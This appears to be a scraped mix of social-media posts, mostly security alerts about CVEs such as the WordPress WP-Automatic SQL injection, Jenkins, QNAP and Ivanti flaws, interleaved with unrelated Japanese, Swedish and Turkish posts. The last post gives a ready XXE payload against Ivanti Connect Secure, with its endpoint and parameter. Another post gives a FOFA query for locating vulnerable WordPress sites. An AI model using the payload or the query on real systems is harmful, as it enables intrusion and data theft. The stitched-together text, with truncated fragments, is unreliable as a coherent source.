IR teams at 2AM when the CVE drops.

Today, I took a few minutes to analyze the #WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) #security #vulnerability . Turns out it is super easy to exploit.

Here is a basic PoC:
Since 'q' is passed directly into a $wpdb->get_results() call,…

本日チェルシーホテルにてライブありがとうございました！！！
汗だらだらだった、、たのしかった✊🏻
4月ラスト会いに来てくれて嬉しかったー！

#カレバン

#喜多郁代生誕祭2024

⚠️⚠️ PoC for CVE-2024-27956(CVSS 9.9) Unauthenticated Arbitrary SQL Execution🔥

🎯4.6k+ Results are found on the en.fofa.info nearly year.

FOFA Link🔗:en.fofa.info/result?qbase64…

FOFA Query: body='wp-content/plugins/wp-automatic'

CVE Alert yolda geliyor :)

Testler şimdilik iyi gidiyor, yakında bunu da salarız :)

👨‍💻🔐 A new security #vulnerability (CVE-2024-27322) has been discovered in the R #programming language. It could allow attackers to execute arbitrary code through malicious RDS files, exposing your projects to supply chain attacks.

Read: thehackernews.com/2024/04/new-r-…

#cybersecurity

🚨 Attention #WordPress users!

A critical SQL injection #vulnerability (CVE-2024-27956) in the WP-Automatic plugin is being actively exploited. With a max severity of 9.9/10, this bug enables site takeovers and malicious activities.

Details: thehackernews.com/2024/04/hacker…

#hacking

➭ PS5 7.01 test CVE-2006-4304 🧐🤔
→ github.com/Master-s/PS4-9…

Jenkins CVE-2024-23897 RCE
Nuclei default templates dont gives any result so i just modified the templates with latest one..

The PS4 (up to FW 11.00) and PS5 (up to FW 8.20) were vulnerable to CVE-2006-4304: hackerone.com/reports/2177925. I'll share details about successful exploitation at TyphoonCon.

'Life finds a way' – Floppy, probably

Stöd utnyttjas av kriminella: ”För många blåser systemet”

Bra och viktigt att särskild stödfunktion inrättas på ⁦CVE_se⁩ för att hjälpa kommuner & myndigheter.

Jag har varit en stark blåslampa för att sätta problem på kartan under många, många år tv4play.se/klipp/15e61e81…

'DeFi is dead, it's all about memecoins now.'

JumpCloud Local Privilege Escalation via MSI repair💥CVE-2023-26603

github.com/mandiant/Vulne…

🚨 #Vulnerability Alert🚨

Three Critical QNAP Vulnerabilities Detected.
Hackers Can Hijack Your NAS, Update Immediately.

🔴CVE-2024-32766 (CVSS 10.0);
🔴CVE-2024-27124 (CVSS 7.5);
🔴CVE-2024-32764 (CVSS 9.9).

CVE-2024-27124 (CVSS 7.5) and CVE-2024-32766 (CVSS 10) - These…

4/ '' Lock CVE ''

Bu görevde ise CVE kilitlemenizi istiyor. Önerim düşük bir miktar girmeniz

- Unlock CVE görevinde ise kilitlediğiniz geri çekiyorsunuz. '' Manage '' yazısına tıklayıp çıkan kırmızı yazıda ki '' Release'' basıp cüzdan onayı alıp görevi tamamlıyorsunuz.

CVE-2024-22024, XXE on Ivanti Connect Secure

payload encoded base64:

<?xml version='1.0' ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM 'http://{{external-host}}/x'> %xxe;]><r></r>

send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm

credit: H4x0r.DZ🇩🇿

#BugBounty